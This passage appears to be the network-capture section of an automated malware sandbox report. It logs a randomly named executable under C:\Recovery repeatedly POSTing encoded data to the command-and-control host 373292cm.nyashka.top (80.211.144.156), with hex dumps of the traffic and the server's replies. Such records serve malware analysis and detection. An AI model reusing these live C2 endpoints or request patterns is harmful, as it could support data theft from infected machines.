                                    Data Raw: 09 1d 26 1c 29 26 2a 58 31 38 24 51 33 30 3e 56 3d 3e 23 5b 2a 2d 29 14 24 06 22 00 26 00 0a 50 24 15 21 5d 3f 3d 36 57 25 3c 33 13 2d 24 2b 5d 0c 13 21 04 21 39 2a 13 31 2c 33 05 3e 06 23 5b 22 5a 22 5b 3c 2a 22 0d 3f 01 24 5e 28 17 2b 5a 3f 2a 31 0e 2f 06 36 05 39 30 08 1c 37 3e 2b 52 0d 11 27 0d 3c 03 00 0e 29 07 2b 5d 21 38 2c 03 26 2d 22 1c 32 32 07 0d 26 39 38 11 25 1c 35 1f 33 31 21 57 26 15 26 5b 32 01 29 51 35 18 23 54 2c 00 22 57 01 33 55 56
                                    Data Ascii: &)&*X18$Q30>V=>#[*-)$"&P$!]?=6W%<3-$+]!!9*1,3>#["Z"[<*"?$^(+Z?*1/6907>+R'<)+]!8,&-"22&98%531!W&&[2)Q5#T,"W3UV


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    22192.168.2.64974680.211.144.156806244C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:43:49.247225046 CEST293OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:43:49.591769934 CEST2516OUTData Raw: 5f 54 59 57 51 40 54 51 5b 5f 5a 51 59 51 58 50 57 5c 5d 5a 57 5a 53 59 5c 5d 5f 5a 5b 5f 5f 55 5a 5a 52 5b 55 5f 55 52 58 5e 5c 58 55 56 54 59 5a 5f 58 5b 58 5f 50 5e 58 5d 53 5a 57 59 50 5e 5c 5d 5c 58 50 5f 57 50 42 5e 5a 53 42 58 58 5a 53 5f
                                    Data Ascii: _TYWQ@TQ[_ZQYQXPW\]ZWZSY\]_Z[__UZZR[U_URX^\XUVTYZ_X[X_P^X]SZWYP^\]\XP_WPB^ZSBXXZS_TRW]_]S]UP^]QU^^^RU[[_T[ATZ_YXZZXQXTXUZ__[^UCSYT_VX\TR[\ZQ_A\SS_[[QZV[Y_G\T^[RB\]YX_XPZQR_[XYRC[YXZW[V.^8?5840) <X*)>#",Q 1Q*9 9];>&F$.Y/=
                                    Aug 25, 2024 15:43:50.006643057 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:43:50.142051935 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:43:49 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    23192.168.2.64974780.211.144.156806244C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:43:50.299071074 CEST269OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Aug 25, 2024 15:43:50.654715061 CEST2516OUTData Raw: 5a 51 5c 5e 51 45 51 5b 5b 5f 5a 51 59 55 58 54 57 5e 5d 52 57 5d 53 5d 5c 5d 5f 5a 5b 5f 5f 55 5a 5a 52 5b 55 5f 55 52 58 5e 5c 58 55 56 54 59 5a 5f 58 5b 58 5f 50 5e 58 5d 53 5a 57 59 50 5e 5c 5d 5c 58 50 5f 57 50 42 5e 5a 53 42 58 58 5a 53 5f
                                    Data Ascii: ZQ\^QEQ[[_ZQYUXTW^]RW]S]\]_Z[__UZZR[U_URX^\XUVTYZ_X[X_P^X]SZWYP^\]\XP_WPB^ZSBXXZS_TRW]_]S]UP^]QU^^^RU[[_T[ATZ_YXZZXQXTXUZ__[^UCSYT_VX\TR[\ZQ_A\SS_[[QZV[Y_G\T^[RB\]YX_XPZQR_[XYRC[YXZW[V.X;@!.' !]*-<X9[(#X 0#18P(9? %_8&F$.Y/-
                                    Aug 25, 2024 15:43:50.979058981 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:43:51.178493023 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:43:50 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    24192.168.2.64974880.211.144.156806244C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:43:51.315808058 CEST293OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:43:51.670933008 CEST2516OUTData Raw: 5f 5d 59 53 54 47 51 5b 5b 5f 5a 51 59 5e 58 50 57 5e 5d 5c 57 5c 53 5b 5c 5d 5f 5a 5b 5f 5f 55 5a 5a 52 5b 55 5f 55 52 58 5e 5c 58 55 56 54 59 5a 5f 58 5b 58 5f 50 5e 58 5d 53 5a 57 59 50 5e 5c 5d 5c 58 50 5f 57 50 42 5e 5a 53 42 58 58 5a 53 5f
                                    Data Ascii: _]YSTGQ[[_ZQY^XPW^]\W\S[\]_Z[__UZZR[U_URX^\XUVTYZ_X[X_P^X]SZWYP^\]\XP_WPB^ZSBXXZS_TRW]_]S]UP^]QU^^^RU[[_T[ATZ_YXZZXQXTXUZ__[^UCSYT_VX\TR[\ZQ_A\SS_[[QZV[Y_G\T^[RB\]YX_XPZQR_[XYRC[YXZW[V.^/3#5>+#V">.,<=_?47 +_+_7#!^..&F$.Y/
                                    Aug 25, 2024 15:43:52.012188911 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:43:52.151779890 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:43:51 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    25192.168.2.64974980.211.144.156806244C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:43:52.429029942 CEST293OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:43:52.791280985 CEST2516OUTData Raw: 5f 56 5c 52 54 46 54 58 5b 5f 5a 51 59 53 58 51 57 51 5d 52 57 5a 53 5a 5c 5d 5f 5a 5b 5f 5f 55 5a 5a 52 5b 55 5f 55 52 58 5e 5c 58 55 56 54 59 5a 5f 58 5b 58 5f 50 5e 58 5d 53 5a 57 59 50 5e 5c 5d 5c 58 50 5f 57 50 42 5e 5a 53 42 58 58 5a 53 5f
                                    Data Ascii: _V\RTFTX[_ZQYSXQWQ]RWZSZ\]_Z[__UZZR[U_URX^\XUVTYZ_X[X_P^X]SZWYP^\]\XP_WPB^ZSBXXZS_TRW]_]S]UP^]QU^^^RU[[_T[ATZ_YXZZXQXTXUZ__[^UCSYT_VX\TR[\ZQ_A\SS_[[QZV[Y_G\T^[RB\]YX_XPZQR_[XYRC[YXZW[V.].#"- X4Z>>,(=5^<>84'W41,P*:?Y V9,>&F$.Y/5
                                    Aug 25, 2024 15:43:53.111701012 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:43:53.308345079 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:43:52 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    26192.168.2.64975080.211.144.156806244C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:43:53.437330961 CEST293OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:43:53.794877052 CEST2516OUTData Raw: 5f 5d 5c 50 54 47 51 5e 5b 5f 5a 51 59 51 58 5f 57 5d 5d 58 57 5e 53 54 5c 5d 5f 5a 5b 5f 5f 55 5a 5a 52 5b 55 5f 55 52 58 5e 5c 58 55 56 54 59 5a 5f 58 5b 58 5f 50 5e 58 5d 53 5a 57 59 50 5e 5c 5d 5c 58 50 5f 57 50 42 5e 5a 53 42 58 58 5a 53 5f
                                    Data Ascii: _]\PTGQ^[_ZQYQX_W]]XW^ST\]_Z[__UZZR[U_URX^\XUVTYZ_X[X_P^X]SZWYP^\]\XP_WPB^ZSBXXZS_TRW]_]S]UP^]QU^^^RU[[_T[ATZ_YXZZXQXTXUZ__[^UCSYT_VX\TR[\ZQ_A\SS_[[QZV[Y_G\T^[RB\]YX_XPZQR_[XYRC[YXZW[V.X,6-;# *=+<![?/]7?V41(45\.>&F$.Y/=
                                    Aug 25, 2024 15:43:54.109132051 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:43:54.304596901 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:43:53 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    27192.168.2.64975180.211.144.156806244C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:43:54.439421892 CEST293OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:43:54.794907093 CEST2516OUTData Raw: 5f 5c 59 54 51 45 54 5c 5b 5f 5a 51 59 53 58 56 57 59 5d 58 57 5b 53 5a 5c 5d 5f 5a 5b 5f 5f 55 5a 5a 52 5b 55 5f 55 52 58 5e 5c 58 55 56 54 59 5a 5f 58 5b 58 5f 50 5e 58 5d 53 5a 57 59 50 5e 5c 5d 5c 58 50 5f 57 50 42 5e 5a 53 42 58 58 5a 53 5f
                                    Data Ascii: _\YTQET\[_ZQYSXVWY]XW[SZ\]_Z[__UZZR[U_URX^\XUVTYZ_X[X_P^X]SZWYP^\]\XP_WPB^ZSBXXZS_TRW]_]S]UP^]QU^^^RU[[_T[ATZ_YXZZXQXTXUZ__[^UCSYT_VX\TR[\ZQ_A\SS_[[QZV[Y_G\T^[RB\]YX_XPZQR_[XYRC[YXZW[V-;0,"-" "=<>]?Y7,4!1,+84=.>&F$.Y/5
                                    Aug 25, 2024 15:43:55.121423960 CEST25INHTTP/1.1 100 Continue


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    28192.168.2.64975280.211.144.156806244C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:43:55.192445040 CEST293OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 1828
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:43:55.544792891 CEST1828OUTData Raw: 5a 57 59 50 51 44 54 51 5b 5f 5a 51 59 57 58 55 57 50 5d 52 57 5a 53 5f 5c 5d 5f 5a 5b 5f 5f 55 5a 5a 52 5b 55 5f 55 52 58 5e 5c 58 55 56 54 59 5a 5f 58 5b 58 5f 50 5e 58 5d 53 5a 57 59 50 5e 5c 5d 5c 58 50 5f 57 50 42 5e 5a 53 42 58 58 5a 53 5f
                                    Data Ascii: ZWYPQDTQ[_ZQYWXUWP]RWZS_\]_Z[__UZZR[U_URX^\XUVTYZ_X[X_P^X]SZWYP^\]\XP_WPB^ZSBXXZS_TRW]_]S]UP^]QU^^^RU[[_T[ATZ_YXZZXQXTXUZ__[^UCSYT_VX\TR[\ZQ_A\SS_[[QZV[Y_G\T^[RB\]YX_XPZQR_[XYRC[YXZW[V.\;85>;7))=/+.)]+ / "<R('#01Y/&F$.Y/-
                                    Aug 25, 2024 15:43:55.860856056 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:43:55.995625019 CEST308INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:43:55 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 152
                                    Connection: keep-alive
                                    Data Raw: 09 1d 25 0f 28 35 2e 59 25 15 05 0d 24 33 26 52 29 5b 3c 02 3d 13 08 07 24 38 21 5e 26 2e 02 13 24 2b 29 5c 28 3e 04 19 32 11 3b 58 2d 34 2b 5d 0c 13 22 1b 34 2a 22 5d 24 3f 2f 03 3e 3b 2f 5b 22 02 29 05 28 2a 03 54 28 11 38 58 3c 39 23 59 2b 39 36 11 38 01 2a 03 39 0e 04 1c 34 3e 2b 52 0d 11 27 0c 29 3d 0b 52 29 2e 1e 07 23 38 30 03 33 2d 0c 50 31 32 22 54 26 39 0e 5c 32 31 25 51 30 22 35 1f 31 2b 0c 5e 32 01 0f 50 21 22 23 54 2c 00 22 57 01 33 55 56
                                    Data Ascii: %(5.Y%$3&R)[<=$8!^&.$+)\(>2;X-4+]"4*"]$?/>;/[")(*T(8X<9#Y+968*94>+R')=R).#803-P12"T&9\21%Q0"51+^2P!"#T,"W3UV


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    29192.168.2.64975380.211.144.156806244C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:43:55.465590000 CEST293OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:43:55.810698986 CEST2516OUTData Raw: 5f 53 5c 5f 51 45 54 5f 5b 5f 5a 51 59 56 58 55 57 50 5d 5b 57 58 53 5e 5c 5d 5f 5a 5b 5f 5f 55 5a 5a 52 5b 55 5f 55 52 58 5e 5c 58 55 56 54 59 5a 5f 58 5b 58 5f 50 5e 58 5d 53 5a 57 59 50 5e 5c 5d 5c 58 50 5f 57 50 42 5e 5a 53 42 58 58 5a 53 5f
                                    Data Ascii: _S\_QET_[_ZQYVXUWP][WXS^\]_Z[__UZZR[U_URX^\XUVTYZ_X[X_P^X]SZWYP^\]\XP_WPB^ZSBXXZS_TRW]_]S]UP^]QU^^^RU[[_T[ATZ_YXZZXQXTXUZ__[^UCSYT_VX\TR[\ZQ_A\SS_[[QZV[Y_G\T^[RB\]YX_XPZQR_[XYRC[YXZW[V.\/3?@5 V:>4>.-Z<-#<#0<:8 >,&F$.Y/!
                                    Aug 25, 2024 15:43:56.145257950 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:43:56.343777895 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:43:55 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    30192.168.2.64975580.211.144.156806244C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:43:56.478168964 CEST269OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Aug 25, 2024 15:43:56.826076031 CEST2516OUTData Raw: 5a 52 59 55 51 42 54 59 5b 5f 5a 51 59 56 58 50 57 5d 5d 5f 57 50 53 5e 5c 5d 5f 5a 5b 5f 5f 55 5a 5a 52 5b 55 5f 55 52 58 5e 5c 58 55 56 54 59 5a 5f 58 5b 58 5f 50 5e 58 5d 53 5a 57 59 50 5e 5c 5d 5c 58 50 5f 57 50 42 5e 5a 53 42 58 58 5a 53 5f
                                    Data Ascii: ZRYUQBTY[_ZQYVXPW]]_WPS^\]_Z[__UZZR[U_URX^\XUVTYZ_X[X_P^X]SZWYP^\]\XP_WPB^ZSBXXZS_TRW]_]S]UP^]QU^^^RU[[_T[ATZ_YXZZXQXTXUZ__[^UCSYT_VX\TR[\ZQ_A\SS_[[QZV[Y_G\T^[RB\]YX_XPZQR_[XYRC[YXZW[V-,0<![ V=+-_("+#Z",#P7W0W<#^7#%/.&F$.Y/!
                                    Aug 25, 2024 15:43:57.210558891 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:43:57.343698978 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:43:56 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    31192.168.2.64975680.211.144.156806244C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:43:57.550467014 CEST269OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Aug 25, 2024 15:43:57.910370111 CEST2516OUTData Raw: 5f 56 59 57 51 42 51 5c 5b 5f 5a 51 59 5e 58 51 57 5a 5d 58 57 59 53 5d 5c 5d 5f 5a 5b 5f 5f 55 5a 5a 52 5b 55 5f 55 52 58 5e 5c 58 55 56 54 59 5a 5f 58 5b 58 5f 50 5e 58 5d 53 5a 57 59 50 5e 5c 5d 5c 58 50 5f 57 50 42 5e 5a 53 42 58 58 5a 53 5f
                                    Data Ascii: _VYWQBQ\[_ZQY^XQWZ]XWYS]\]_Z[__UZZR[U_URX^\XUVTYZ_X[X_P^X]SZWYP^\]\XP_WPB^ZSBXXZS_TRW]_]S]UP^]QU^^^RU[[_T[ATZ_YXZZXQXTXUZ__[^UCSYT_VX\TR[\ZQ_A\SS_[[QZV[Y_G\T^[RB\]YX_XPZQR_[XYRC[YXZW[V.,'@6>(\4V)Y>.+(*).7 ?7V78R(+\73:..&F$.Y/
                                    Aug 25, 2024 15:43:58.232053041 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:43:58.363725901 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:43:57 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    32192.168.2.64975780.211.144.156806244C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:43:58.491348028 CEST269OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Aug 25, 2024 15:43:58.841797113 CEST2516OUTData Raw: 5f 51 59 52 54 45 51 5b 5b 5f 5a 51 59 5f 58 51 57 5d 5d 53 57 5f 53 5c 5c 5d 5f 5a 5b 5f 5f 55 5a 5a 52 5b 55 5f 55 52 58 5e 5c 58 55 56 54 59 5a 5f 58 5b 58 5f 50 5e 58 5d 53 5a 57 59 50 5e 5c 5d 5c 58 50 5f 57 50 42 5e 5a 53 42 58 58 5a 53 5f
                                    Data Ascii: _QYRTEQ[[_ZQY_XQW]]SW_S\\]_Z[__UZZR[U_URX^\XUVTYZ_X[X_P^X]SZWYP^\]\XP_WPB^ZSBXXZS_TRW]_]S]UP^]QU^^^RU[[_T[ATZ_YXZZXQXTXUZ__[^UCSYT_VX\TR[\ZQ_A\SS_[[QZV[Y_G\T^[RB\]YX_XPZQR_[XYRC[YXZW[V.;A6>< 0&*=<_?.:+,7<+Q4/+93X4%,>&F$.Y/
                                    Aug 25, 2024 15:43:59.159846067 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:43:59.287777901 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:43:58 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    33192.168.2.64975880.211.144.156806244C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:43:59.408261061 CEST293OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:43:59.767230988 CEST2516OUTData Raw: 5a 50 59 54 54 40 54 5f 5b 5f 5a 51 59 56 58 5f 57 5c 5d 5d 57 58 53 59 5c 5d 5f 5a 5b 5f 5f 55 5a 5a 52 5b 55 5f 55 52 58 5e 5c 58 55 56 54 59 5a 5f 58 5b 58 5f 50 5e 58 5d 53 5a 57 59 50 5e 5c 5d 5c 58 50 5f 57 50 42 5e 5a 53 42 58 58 5a 53 5f
                                    Data Ascii: ZPYTT@T_[_ZQYVX_W\]]WXSY\]_Z[__UZZR[U_URX^\XUVTYZ_X[X_P^X]SZWYP^\]\XP_WPB^ZSBXXZS_TRW]_]S]UP^]QU^^^RU[[_T[ATZ_YXZZXQXTXUZ__[^UCSYT_VX\TR[\ZQ_A\SS_[[QZV[Y_G\T^[RB\]YX_XPZQR_[XYRC[YXZW[V-8,#.$#!]*0<>%^<=7[#,+S 1P(_4 ;&F$.Y/!
                                    Aug 25, 2024 15:44:00.082312107 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:44:00.215471029 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:43:59 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    34192.168.2.64975980.211.144.156806244C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:44:00.690026045 CEST293OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Connection: Keep-Alive


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    35192.168.2.64976080.211.144.156806244C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:44:01.004389048 CEST293OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 1820
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:44:01.357532978 CEST1820OUTData Raw: 5f 53 5c 5f 51 40 54 5e 5b 5f 5a 51 59 5e 58 50 57 5a 5d 58 57 5d 53 5d 5c 5d 5f 5a 5b 5f 5f 55 5a 5a 52 5b 55 5f 55 52 58 5e 5c 58 55 56 54 59 5a 5f 58 5b 58 5f 50 5e 58 5d 53 5a 57 59 50 5e 5c 5d 5c 58 50 5f 57 50 42 5e 5a 53 42 58 58 5a 53 5f
                                    Data Ascii: _S\_Q@T^[_ZQY^XPWZ]XW]S]\]_Z[__UZZR[U_URX^\XUVTYZ_X[X_P^X]SZWYP^\]\XP_WPB^ZSBXXZS_TRW]_]S]UP^]QU^^^RU[[_T[ATZ_YXZZXQXTXUZ__[^UCSYT_VX\TR[\ZQ_A\SS_[[QZV[Y_G\T^[RB\]YX_XPZQR_[XYRC[YXZW[V./ ;5_709Z>,<>??\ 7 W?:#\#V%\,.&F$.Y/
                                    Aug 25, 2024 15:44:01.706126928 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:44:01.950906038 CEST308INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:44:01 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 152
                                    Connection: keep-alive
                                    Data Raw: 09 1d 26 11 3d 35 32 5c 32 05 0e 16 30 33 39 0e 2b 2d 3b 13 2b 2d 21 58 33 5e 25 5f 25 58 33 0e 24 38 2a 02 3c 2e 04 51 31 2f 3f 5a 39 34 2b 5d 0c 13 21 07 23 39 3a 58 26 02 2f 03 2b 3b 23 5c 36 5a 36 5a 28 03 21 50 3e 2f 01 02 3f 5f 3b 1e 28 14 00 57 38 06 21 16 2e 09 2e 55 34 3e 2b 52 0d 11 24 10 3f 13 21 1f 3d 2e 23 17 23 28 28 02 33 03 26 57 32 0b 21 0d 24 00 3c 5c 32 21 21 1f 27 1f 07 54 25 2b 0f 03 25 06 3d 12 36 32 23 54 2c 00 22 57 01 33 55 56
                                    Data Ascii: &=52\2039+-;+-!X3^%_%X3$8*<.Q1/?Z94+]!#9:X&/+;#\6Z6Z(!P>/?_;(W8!..U4>+R$?!=.##((3&W2!$<\2!!'T%+%=62#T,"W3UV


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    36192.168.2.64976180.211.144.156806244C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:44:01.124092102 CEST293OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:44:01.482335091 CEST2516OUTData Raw: 5a 55 5c 54 54 44 54 51 5b 5f 5a 51 59 50 58 51 57 5e 5d 53 57 5c 53 54 5c 5d 5f 5a 5b 5f 5f 55 5a 5a 52 5b 55 5f 55 52 58 5e 5c 58 55 56 54 59 5a 5f 58 5b 58 5f 50 5e 58 5d 53 5a 57 59 50 5e 5c 5d 5c 58 50 5f 57 50 42 5e 5a 53 42 58 58 5a 53 5f
